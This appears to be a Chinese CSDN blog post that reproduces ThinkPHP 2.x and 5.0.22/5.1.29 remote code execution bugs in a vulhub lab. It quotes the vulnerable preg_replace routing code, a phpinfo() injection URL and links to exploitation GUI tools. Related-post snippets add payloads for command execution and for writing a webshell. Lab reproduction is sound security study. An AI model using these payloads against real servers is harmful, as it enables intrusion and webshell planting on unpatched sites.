thinkphp系列vulhub所有漏洞复现ThinkPHP 2.x 任意代码执行漏洞,ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

已于 2023-07-08 11:55:26 修改
阅读量366 收藏 1
点赞数 1
分类专栏: 漏洞复现:网络安全的实验室 文章标签: 网络安全 web安全 安全
于 2023-07-06 10:47:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47289634/article/details/131569948
版权

ThinkPHP 2.x 任意代码执行漏洞

漏洞详情:

hinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

复现:

环境启动后,访问http://your-ip:8080/index即可查看到默认页面。
在这里插入图片描述
直接访问

http://your-ip:8080/index.php?s=/index/index/name/${@phpinfo()}
在这里插入图片描述

代码执行成功

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

漏洞详情:

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

复现:

开启靶场环境并访问地址
在这里插入图片描述
这里直接放几个漏洞利用的工具把

https://github.com/Lotus6/ThinkphpGUI
https://github.com/bewhale/thinkphp_gui_tools
在这里插入图片描述

thinkphp类的漏洞有很多工具可以直接用,不写了
在这里插入图片描述

青衫木马牛
关注
专栏目录
漏洞复现ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1497
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 664
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPhp 代码执行 (CNVD-2018-24942)漏洞复现
beichenyyds的博客
03-03 5124
漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本: ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp http://vulfocus.fofa.so:43095/index.php/?s=index/\think\app/invokefunctio
ThinkPHP框架被爆任意代码执行漏洞
weixin_34054931的博客
01-08 2773
 昨日ThinkPHP框架被爆出了一个php代码任意执行漏洞,黑客只需提交一段特殊的URL就可以在网站上执行恶意代码。   ThinkPHP作为国内使用比较广泛的老牌PHP MVC框架,有不少创业公司或者项目都用了这个框架。不过大多数开发者和使用者并没有注意到本次漏洞的危害性,chinaz源码报导提醒:此漏洞是一个非常严重的问题,只要使用了thinkphp框架,就可以直接执行任意php代码,请使...
thinkphp漏洞利用工具-ThinkphpGUI(一)
siu~
08-17 4135
Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
Thinkphp漏洞复现
weixin_51151498的博客
12-17 1350
Thinkphp漏洞复现
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
记录笔记
04-12 506
ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8089/index.php?s=captcha会出现如下报错 F12进入开发者 用HackBar 插件发送 POST 请求 得到回显: 通过echo命令写入 Webshell 文件 首先将一句话木马进行 Base64 编码 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE
记录一次vulhubThinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现
sszsNo1的博客
06-29 234
vulhubThinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
zeroc009的博客
02-15 651
漏洞简述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 影响范围 受影响的版本 ThinkPHP 5.0.x < 5.0.23 ThinkPHP 5.1.x < 5.1.31 不受影响的版本 ThinkPHP 5.0.23 ThinkPHP 5.1.31 复现过程 phpinfo、命令执行 http://192.168.1.7:8080/index.php?s=
thinkphp漏洞利用工具-ThinkphpGUI(二)
siu~
08-17 1200
thinkphp漏洞利用工具
thinkphp漏洞利用工具-thinkphp_gui_tools(三)
siu~
08-17 4157
ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过
vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
qq_53409748的博客
03-16 265
vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2355
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
ThinkPHP 2.x 任意代码执行漏洞
ADummy的博客
02-19 146
ThinkPHP 2.x 任意代码执行漏洞 by ADummy 0x00利用路线 ​ 直接url执行代码 0x01漏洞介绍 ​ ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); ​ 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 ​ T
Thinkphp 2.x 任意代码执行漏洞
最新发布
hovcfuti的博客
10-13 298
漏洞简介ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。preg_replace这个函数使用方法如下:preg_replace('正则规则','替换字符','目标字符')这个函数的3个参数,结合起来的意思是:如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞
ThinkPHP漏洞系列/2.x 任意代码执行漏洞
jammny
11-17 1417
漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 影响版本: Thinkphp2.x系列以及ThinkPHP 3.0版.
thinkphp 2.x 任意代码执行漏洞
06-28
这个问题是关于ThinkPHP 2.x是否存在代码漏洞的。据我所知,目前没有任何官方宣布过该版本存在漏洞的消息。但是任何一个应用程序都有可能存在漏洞,因此在使用任何版本的框架时都需要小心谨慎,并始终保持最新版本的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值